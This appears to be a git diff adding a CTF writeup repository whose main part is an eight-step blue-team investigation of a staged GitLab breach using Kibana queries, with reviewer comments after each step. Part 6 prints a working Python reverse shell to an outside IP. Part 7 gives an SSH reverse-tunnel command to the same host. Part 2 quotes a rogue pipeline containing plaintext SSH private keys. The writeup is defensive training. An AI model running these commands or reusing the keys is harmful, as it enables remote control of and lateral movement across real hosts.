feat: added 24h@CTF 2023
@ -0,0 +1,41 @@
# Blue's Clues 1/8: Gitlab Server
> You are a blue team analyst working in a Security Operation Center (SOC) for Rezifp, a major pharmaceutical company that may or may not have developped a 91-divoc Vaccine.

> It's friday morning. You get several Teams messages in quick succession from Martin Mistigri, one of the devops engineer at your firm:

```
Yo blueeeeee whatsssss upppppp 🤜
There is some WEIRD stuff going on here no cap 😳
so
I was vibin, eating my chocolatine, and had some maintenance to do for our CI/CD pipeline on gitlab right
well IT TURNS OUT that a new pipeline has appeared out of nowhere??
the pipeline is called "Monitoring"
it's so sus
anyway could u look at it and see if its legit or not
```

> You have been preparing for this moment for your whole carreer. Finally, a real breach??

> Equiped with your SIEM (Elastic stack), your EDRs (Elastic Defend) and your blue team knowledge, investigate the logs and find what happened.

> Note: This is a log analysis and investigation challenge. The important sections of the challenge will be the "security" section and the "discover" tab in the "Analytics" section. For reference on how to do searches in elasticsearch using the Kibana Query Language (KQL), refer to this link: https://www.elastic.co/guide/en/kibana/current/kuery-query.html

> Note: Flags in this track will not have the standard flag format. The flag format is specified in each challenge.

> Flag1: Find the name of the Gitlab Server.

## About the Challenge
We need to find the Gitlab server name

## How to Solve?
Go to `Analytics` menu and then choose `Discover` menu

![discover](images/discover.png)

And then search `agent.name` in `Search` form. Press that to see the name of the Gitlab server

![flag](images/flag.png)

```
Rezifp-Gitlab-Server
```
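Review bot: the "How to Solve?" section of 1/8 never writes out the search that was typed into Discover, only two screenshots, so a reader without the images cannot reproduce it; quote the query text (the prose only says `agent.name` was looked up in the search field) together with the index pattern and time range used. Worth one sentence that `agent.name` is the name the Elastic Agent was enrolled with, which here happens to equal the host name; `host.hostname`, the field this writeup itself relies on in 4/8 and 7/8, is the more reliable place to read a server's name from.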
@ -0,0 +1,62 @@
# Welcome!
> Martin the devops engineer sends you a copy of what the weird CI/CD pipeline does:

```
variables:
PRIVATE_KEY_GITLAB: |
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACAWFFrVpN4X2AduHjJhV7W5NEBxs0n2fwF3/+ig86EqTAAAAKAoGJ+vKBif
rwAAAAtzc2gtZWQyNTUxOQAAACAWFFrVpN4X2AduHjJhV7W5NEBxs0n2fwF3/+ig86EqTA
AAAECw7Qmm2do1DNITF0147jS8q99/Re2/9SV4iJlNN2GzKBYUWtWk3hfYB24eMmFXtbk0
QHGzSfZ/AXf/6KDzoSpMAAAAHGJhY2t1cHNAUmV6aWZwLUdpdExhYi1TZXJ2ZXIB
-----END OPENSSH PRIVATE KEY-----
PRIVATE_KEY_FS: |
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBqwJbg0jEAhyNKSt4i8FStwU8RA7wvvZbTqpCEhQUjtQAAAKAiB9rPIgfa
zwAAAAtzc2gtZWQyNTUxOQAAACBqwJbg0jEAhyNKSt4i8FStwU8RA7wvvZbTqpCEhQUjtQ
AAAEBVDBKygi9Cq1JJUuCPtXCVcPzVCmO0zWhVrPS9v43ZFWrAluDSMQCHI0pK3iLwVK3B
TxEDvC+9ltOqkISFBSO1AAAAF0xpbnV4QWRtaW5ARmlsZVNlcnZlcjAyAQIDBAUG
-----END OPENSSH PRIVATE KEY-----
PRIVATE_KEY_WEB: |
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBxALoFgiT34kOecbp7apS5zLKmVIWDtF9XJH0wTJIUywAAAKhGbRnhRm0Z
4QAAAAtzc2gtZWQyNTUxOQAAACBxALoFgiT34kOecbp7apS5zLKmVIWDtF9XJH0wTJIUyw
AAAEBwHzDMUnHlEuTOM0xAfoTAQzbBb2B2S3ubo5MqII/6SnEAugWCJPfiQ55xuntqlLnM
sqZUhYO0X1ckfTBMkhTLAAAAIFJlemlmcEFkbWluQFJlemlmcC1HaXRMYWItU2VydmVyAQ
IDBAU=
-----END OPENSSH PRIVATE KEY-----

stages:
- deploy

deploy-job:
stage: deploy
environment: production
script:
- chmod u+x ./health-agent
- nohup ./health-agent &
# - eval "$(ssh-agent -s)"
# - echo "${PRIVATE_KEY_WEB}"
# - echo -n "${PRIVATE_KEY_WEB}" | ssh-add -
# - rsync -zPe "ssh -o StrictHostKeyChecking=no" ./ Webmestre@10.0.0.5:/tmp/
# - ssh -Nf -o "StrictHostKeyChecking=no" Webmestre@10.0.0.5 'chmod u+x /tmp/health-agent; nohup ./health-agent &'
tags:
- shell
```

> This is clearly malicious. Before going further, we need to go back. How did this pipeline get there? Find the username that created the rogue CI/CD pipeline.

## About the Challenge
We need to find the username that created the malicious CI/CD pipeline

## How to Solve?
In the KQL syntax, I inputted `health-agent` because I want to see some logs that contains string `health-agent` and contain the username. I checked one of the logs and we found the username that created the malicious CI/CD pipeline

![flag](images/flag.png)

```
yvandescreds
```
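Review bot: the heading `# Welcome!` is a template leftover; the index table in this same commit links this page as "Blue's Clues 2/8: Source User", so the title should match (the pages for 5/8 and 7/8 have the same leftover). The "How to Solve?" text says `health-agent` was searched but shows neither the query nor the field the username was read from, so the step is not reproducible; quote both (later pages in this set read `gitlab.username`, which is presumably the field used here). Since the pipeline YAML is the central artifact, a few words on why it is malicious would strengthen the page: three SSH private keys pasted in plaintext as CI variables, an unknown `./health-agent` binary started with `nohup`, and commented-out steps that would copy that binary to `Webmestre@10.0.0.5` with `StrictHostKeyChecking=no`, a staged lateral-movement path. The trailing base64 of each key blob is the key comment and decodes to `backups@Rezifp-GitLab-Server`, `LinuxAdmin@FileServer02` and `RezifpAdmin@Rezifp-GitLab-Server`, which tells a responder which accounts and hosts need their keys rotated.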
@ -0,0 +1,24 @@
# Blue's Clues 3/8: Source IP
> Martin has no idea who this user is, it's not a Rezifp employee and it has admin privileges. From which IP was this user created, by which user, using which user agent, and using which type of gitlab token?

> Flag format: <creator_username>|<source_ip>|<user_agent>|<gitlab_token_type>

> Not case sensitive.

> Example: myaccount|127.0.0.1|someuseragent|SomeTokenType

## About the Challenge
We need to find the some information for example, username, source ip, etc that created `yvandescreds` account

## How to Solve?
First, I searched the username in the KQL syntax and then I want to find the log that contains string `username`. And if we check the result of `gitlab.username` search field, the result is `mimine1965` created that user

![username](images/username.png)

After that, I changed the KQL syntax like the image below because I want to find the log when `mimine1965` created `yvandescreds`. Choose the oldest logs and you will obtain some information

![flag](images/flag.png)

```
mimine1965|10.0.0.5|curl/8.0.1|PersonalAccessToken
```
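Review bot: both Discover queries in 3/8 are referred to only as "the image below", so the query strings themselves belong in the text; from the narrative the first is a search for `yvandescreds` read through `gitlab.username`, and the second combines both usernames and is sorted by `@timestamp` ascending, because the user-creation event is the earliest record that mentions the new account. The reasoning behind the flag is also left to the reader: `10.0.0.5` plus `curl/8.0.1` plus `PersonalAccessToken` means mimine1965's personal access token was used from an internal host through curl rather than the web UI, which is what makes the pivot to that host in 4/8 follow.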
@ -0,0 +1,18 @@
# Blue's Clues 4/8: Source Machine
> What? It's an internal IP? What is the hostname of this IP?

> Flag format: <hostname>

> Not case sensitive.

## About the Challenge
We need to find the hostname of the IP (10.0.0.5)

## How to Solve?
I searched about `10.0.0.5` in KQL syntax form and then if we check the result of `host.hostname`. The hostname is WebServer01

![flag](images/flag.png)

```
WebServer01
```
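Review bot: a bare search for `10.0.0.5` matches every field that carries the value (source and destination addresses, `host.ip`, the GitLab `remote_ip` field used in 7/8), so the text should say which document the `host.hostname` value was read from. Scoping the query to `host.ip : 10.0.0.5` returns that machine's own agent records directly, and that is what actually proves the hostname, since `host.hostname` is populated by the Elastic Agent on the host itself rather than by GitLab's view of the client.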
@ -0,0 +1,26 @@
# Welcome!
> The web server?? How did the threat actor get access to the web server? Surely we have logs for that... It hosts a simple PHP website, nothing complex.

> Find the malicious file.

> Flag format: <filename>.<fileextension>

> Example: mywebshell.aspx

## About the Challenge
We need to find the name of the webshell

## How to Solve?
Im using this KQL syntax because I want to find the URL that using `PHP` extension and the HTTP response code returned `200 OK`

```
url.extension : php and http.response.status_code : 200
```

And then I searched the log one by one until I found this weird PHP file

![flag](images/flag.png)

```
ce52790629679d930ca16c39a4f619c3.php
```
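Review bot: the query `url.extension : php and http.response.status_code : 200` returns every successful PHP request on the site, and the text then says the logs were read "one by one"; describe a reproducible path instead: add `http.request.method : POST` (webshell command submissions are normally POSTs) and look at the top values of `url.path` in the field statistics so the rare path stands out. The flag `ce52790629679d930ca16c39a4f619c3.php`, a 32-hex-character name among otherwise readable page names, is the anomaly to call out explicitly; that naming pattern (a new randomly named file in the web root) is itself a usable detection. The heading `# Welcome!` should read "Blue's Clues 5/8: Initial Access" to match the index.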
@ -0,0 +1,22 @@
# Blue's Clues 6/8: Discovery
> Is that... a webshell?

> We can see the commands that were executed by the attacker. However, we don't see any command hinting at the creation of the rogue user in gitlab. There must be an intermediary step.

> What is the last command executed by the webshell?

> Flag format: <decoded_command> Not case sensitive, but keep special chars.

> Example: ls -latr

## About the Challenge
We need to find the last command executed by webshell

## How to Solve?
By using the same KQL syntax, I searched the logs one by one and check when the attacker stop accessing the webshell. And we found the last command was reverse shell command

![flag](images/flag.png)

```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("158.69.62.65",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
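Review bot: the challenge asks for the decoded command, but the writeup never says how the command arrived encoded in the webshell request or how it was decoded, which is the one step a reader needs; add the raw parameter value and the decoding applied. A sentence on what the flag does would also help: it connects to 158.69.62.65 on port 8080 and `dup2`s stdin, stdout and stderr onto the socket before spawning `/bin/sh -i`, which is why no further webshell requests follow (the session moved to the interactive shell). That IP reappears in 7/8 as the SSH endpoint, so it should be recorded once as attacker infrastructure; an outbound connection from the web server to an external host on 8080 is the detection to note.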
@ -0,0 +1,26 @@
# Welcome!
> Okay. Let's recap. The web server somehow got exploited, and a webshell was uploaded. The webshell allowed for commands to be executed. A reverse-shell was launched. A gitlab user was created. The gitlab user created a malicious pipeline.

> Using this search in analytics>discover: host.hostname :"Rezifp-GitLab-Server" and gitlab.meta.remote_ip:10.0.0.5 and gitlab.ua:* And going into the "field statistics" tab, we can see that there are two user agents: curl and firefox, that made queries to our gitlab from the web server. However, firefox is not installed on the web server. There must be a tunnel/socks proxy that was created. Find the command line that created that tunnel.

> Flag format: <commandline>

> Example: ./tunnelcreator create tunnel --awesome

## About the Challenge
We need to find the command that created the tunnel/socks proxy

## How to Solve?
Im using this KQL syntax because I want to find the command that related to SSH and the `-R` option is used to set up a reverse port forwarding, also known as remote port forwarding. It allows connections from the remote SSH server to be forwarded to a local machine or a different machine on the client's network.

```
"ssh" and "-R"
```

And then find `proccess.command_line` in the `Search Field` form

![flag](images/flag.png)

```
ssh -i /tmp/key -r 8080 rezifp-admin@158.69.62.65
```
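Review bot: `proccess.command_line` in the "How to Solve?" text is a typo for the ECS field `process.command_line`, and the heading `# Welcome!` should read "Blue's Clues 7/8: Tunnel". The explanation of `-R` describes classic remote port forwarding, but the flagged command `ssh -i /tmp/key -r 8080 rezifp-admin@158.69.62.65` gives only a port and no destination: in OpenSSH that form (`-R port`) is reverse dynamic forwarding, which opens a SOCKS listener on the remote (attacker) side that tunnels back through the web server, and that is precisely what explains a Firefox user agent reaching GitLab from 10.0.0.5; stating it ties the challenge hint to the command. Note also that the logged command has lowercase `-r` while the search term was `-R`: the free-text search `"ssh" and "-R"` matched because it runs over analyzed text fields, so for a case-exact hunt query the keyword field `process.command_line` directly.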
@ -0,0 +1,26 @@
# Blue's Clues 8/8: C2
> The pipeline executes on the gitlab server itself. It must be some kind of persistence. Find the C2.

> Flag Format: <domain_name>

> Lowercase.

> Example: a.b.google.com

## About the Challenge
We need to find the C2 domain name

## How to Solve?
Without using any KQL syntax, check the `url.path` result

![url_path](images/url_path.png)

You will notice there is a very long URL path called `obr7CrUaaoy5LL8u3RqT6gLBTkdO5pzAqUs4JMcqsFRWulE8tgQA7EqqRD_Gx0MgO6HSwMlj5TleRRXMwcblsFn2o2enyUpuCsEf-d8ExZjl1eI2T4Mm0V`. Press the plus button to add the URL path into KQL syntax

![flag](images/flag.png)

Now check the `url.full` result to obtain the C2 server name

```
rezfiphealthcheck-f9fsh8dqbjfwasf7.z01.azurefd.net
```
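Review bot: the filter is described only as "press the plus button"; write out the resulting KQL (`url.path : "obr7CrUaaoy5LL8u3RqT6gLBTkdO5pzAqUs4JMcqsFRWulE8tgQA7EqqRD_Gx0MgO6HSwMlj5TleRRXMwcblsFn2o2enyUpuCsEf-d8ExZjl1eI2T4Mm0V"`) so the step is reproducible. The C2 `rezfiphealthcheck-f9fsh8dqbjfwasf7.z01.azurefd.net` is an Azure Front Door endpoint whose name imitates the company (`rezfip` against `Rezifp`) and echoes the `health-agent` binary the pipeline launches in 2/8; one sentence making that link closes the loop of the track, and it argues for detections keyed on the `health-agent` process's network connections and on the unusually long random path rather than on the hostname, since CDN-fronted names are cheap for an operator to rotate.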
@ -0,0 +1,14 @@
# Preparation - Adipol Lipidex 32mg
> You have been tasked to investigate the company that created the horrible Adipol Lipidex 32mg. Please open the attached file. When you do so you will receive further instructions.

## About the Challenge
We need to open the file to obtain the flag (You can download the file [here](Adipol_Lipidex_32_mg.ad1))

## How to Solve?
Open the file using FTK Imager and read `ReadMe.txt` file to obtain the flag

![flag](images/flag.png)

```
FLAG{y0u_sucCesfully_0p3n3d_M3_}
```
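Review bot: the link target `Adipol_Lipidex_32_mg.ad1` is a relative path into this repository, but none of the hunks in this commit add such a file, so verify it is committed or point the link at the challenge source, otherwise it 404s. One line on what an `.ad1` is (an AccessData logical evidence image, opened in FTK Imager through File > Add Evidence Item > Image File) would help readers who have not used the tool.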
@ -0,0 +1,15 @@
# 24h@CTF 2023
CTF writeup for The 24h@CTF 2023. I took part in this CTF competition (Solo), and got 15th place out of 170 users

| Category | Challenge |
| --- | --- |
| Desjardins - Blue Team | [Blue's Clues 1/8: Gitlab Server](/24h%40CTF%202023/Blue's%20Clues%201%20Gitlab%20Server/)
| Desjardins - Blue Team | [Blue's Clues 2/8: Source User](/24h%40CTF%202023/Blue's%20Clues%202%20Source%20User/)
| Desjardins - Blue Team | [Blue's Clues 3/8: Source IP](/24h%40CTF%202023/Blue's%20Clues%203%20Source%20IP/)
| Desjardins - Blue Team | [Blue's Clues 4/8: Source Machine](/24h%40CTF%202023/Blue's%20Clues%204%20Source%20Machine/)
| Desjardins - Blue Team | [Blue's Clues 5/8: Initial Access](/24h%40CTF%202023/Blue's%20Clues%205%20Initial%20Access/)
| Desjardins - Blue Team | [Blue's Clues 6/8: Discovery](/24h%40CTF%202023/Blue's%20Clues%206%20Discovery/)
| Desjardins - Blue Team | [Blue's Clues 7/8: Tunnel](/24h%40CTF%202023/Blue's%20Clues%207%20Tunnel/)
| Desjardins - Blue Team | [Blue's Clues 8/8: C2](/24h%40CTF%202023/Blue's%20Clues%208%20C2/)
| Forensics | [Preparation - Adipol Lipidex 32mg](/24h%40CTF%202023/Preparation%20-%20Adipol%20Lipidex%2032mg/)
| Trivia | [The Cuckoo's Egg](/24h%40CTF%202023/The%20Cuckoo's%20Egg/)
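Review bot: the data rows of the table lack their trailing `|` and the link paths embed an unencoded apostrophe in `Blue's` and `Cuckoo's`; GitHub tolerates both, but closing the rows and encoding the apostrophe as `%27` keeps the table and links valid in other renderers. The names listed here also disagree with the page headings for 2/8, 5/8 and 7/8, which still carry the template title `# Welcome!`.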
@ -0,0 +1,14 @@
|
# The Cuckoo's Egg
> When Clifford Stoll contacted the FBI for the first time regarding a potential intrusion in his systems, how much money did he say he lost (answer in dollars)?

> Flag format: \d+\.\d{2}

## About the Challenge
We need to find the total money

## How to Solve?
Im using ChatGPT to answer this question and the answer is `0.75$`

```
0.75
```
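Review bot: the answer is attributed to ChatGPT with no check against the source; the 75-cent accounting discrepancy is the opening of Stoll's book (The Cuckoo's Egg, 1989), where he recounts telling the FBI the loss amounted to 75 cents, so cite the book rather than a language model, which can be wrong on exactly this kind of detail.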